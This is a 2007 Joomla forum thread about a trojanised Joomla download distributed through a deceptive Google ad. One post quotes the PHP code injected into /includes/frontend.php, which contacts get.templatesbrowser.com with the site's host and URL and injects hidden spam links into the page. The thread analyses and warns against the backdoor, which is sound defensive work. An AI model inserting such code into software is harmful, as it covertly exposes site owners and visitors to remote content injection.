| Joomla! http://forum.joomla.org/ |
|
| Phishing site CONFIRMED http://forum.joomla.org/viewtopic.php?f=267&t=185573 |
Page 1 of 1 |
| Author: | AlecWeb [ Thu Jun 28, 2007 6:27 pm ] |
| Post subject: | Phishing site CONFIRMED |
Hi guys, I found this site today: http://www.templatesbrowser.com/downloa ... UAodhhZbYQ It was a commercial link in Google when I typed 'joomla' as keyword. I wasn't able to check it, but I was thinking this could be a potential malicius file with a backdoor. Just my 2 cents  Regards, Alec |
|
| Author: | pe7er [ Thu Jun 28, 2007 7:42 pm ] |
| Post subject: | Phishing site CONFIRMED |
AlecWeb wrote: I wasn't able to check it, but I was thinking this could be a potential malicius file with a backdoor. Yes, it's Joomla 1.0.12 indeed, but one file has been altered: /includes/frontend.php The following (spyware?) code has been added to the file. It's included in the function mosMainBody(): $url = "http://get.templatesbrowser.com/j.php?" . "host=" . urlencode($_SERVER['HTTP_HOST']) . "&" . "url=" . urlencode($_SERVER['REQUEST_URI']); $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3); if($check) { @readfile($url); fclose($check); } When the mosMainBody is run, the routine creates some URL variable with your server's hostname + your website's URL, it tests if it is able to connect to the templatesbrowser's site. If it is able to create a connection, then some URL (with your hostname + your website's URL) will be retrieved, and templatebrowser can store statistics about your site. |
|
| Author: | pe7er [ Thu Jun 28, 2007 7:51 pm ] |
| Post subject: | Re: Phishing site? |
I was looking for some more info regarding that website, and I found an interesting article: http://www.onnoot.com/e/532/Templatesbr ... _WordPress The article describes the same routine as I found in their Joomla's /includes/frontend.php It includes hidden commercial links ("link spam") in your site, without your knowing! btw: an interesting quote from the onnoot.com website: Quote: Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We're not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google's search result pages.
|
|
| Author: | rliskey [ Thu Jun 28, 2007 8:03 pm ] |
| Post subject: | Re: Phishing site? |
A great example of why is important to download applications ONLY from trusted sites! I've linked to this topic as an example in the Administrators Security Checklist. http://help.joomla.org/component/option ... temid,268/ EDIT: Topic title changed for increased clarity |
|
| Author: | aruba [ Thu Jun 28, 2007 8:55 pm ] |
| Post subject: | Re: Phishing site? |
rliskey wrote: A great example of why is important to download applications ONLY from trusted sites! I've linked to this topic as an example in the Administrators Security Checklist. http://help.joomla.org/component/option ... temid,268/ EDIT: Topic title changed for increased clarity I've been beating the drum on this since last year  It can only get worse IMHO. As Joomla gets more secure, you will see more and more ingenious ways to subvert that security. No where is that more true than the templates and extensions directory. I have always maintained that ALL GPL code submitted to the JED MUST be archived ON Jforge. If there is to be a code update, it is communicated to JForge and the version number is incremented. Even if Joomla does not supply the download and defers to the developer (who may want a link to their site and registration before you can download - a behavior I deplore), an archived copy can protect users from having spy code introduced to their machine. After download, they can compare a generated checksum of the code from site 'X' with the Joomla archived version. There is an incredible risk of hijack and coercive code being introduced to the community. Note that the above code connects to the home site and loads HTML DATA, IT COULD EASILY HAVE LOADED CODE INSTEAD TO BE RUN IN THE CONTEXT OF YOUR SITE! ( by returning a string and executing an EVAL against it) This is very serious news... I hope we can take time off the "GREAT GPL DEBATE DEBACLE" to handle it properly
|
|
| Author: | AlecWeb [ Thu Jun 28, 2007 11:24 pm ] |
| Post subject: | Re: Phishing site CONFIRMED |
Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'): It is an commercial/sponsered link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com". You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla. So any user that doesn't pay attention will download this piece of malware. Maybe the Joomla team could inform Google about this abuse, before to many users follow this link? Anyway, thanks for the great piece of software! (btw: I always use the real joomla.org to download Joomla! Regards, Alec The screenshots: http://alecweb.ulyssis.org/sponsered-link-2.png http://alecweb.ulyssis.org/sponsered-link-joomla.png |
|
| Author: | pe7er [ Fri Jun 29, 2007 2:34 pm ] |
| Post subject: | Re: Phishing site CONFIRMED |
AlecWeb wrote: Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'): It is an commercial/sponsered link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com". You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla. So any user that doesn't pay attention will download this piece of malware. Maybe the Joomla team could inform Google about this abuse, before to many users follow this link? The latest news:
Thanks to all who helped solving this issue (& special thanks to Wordpress user Onnoot for his efforts)
|
|
| Page 1 of 1 | All times are UTC |
| Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |
|
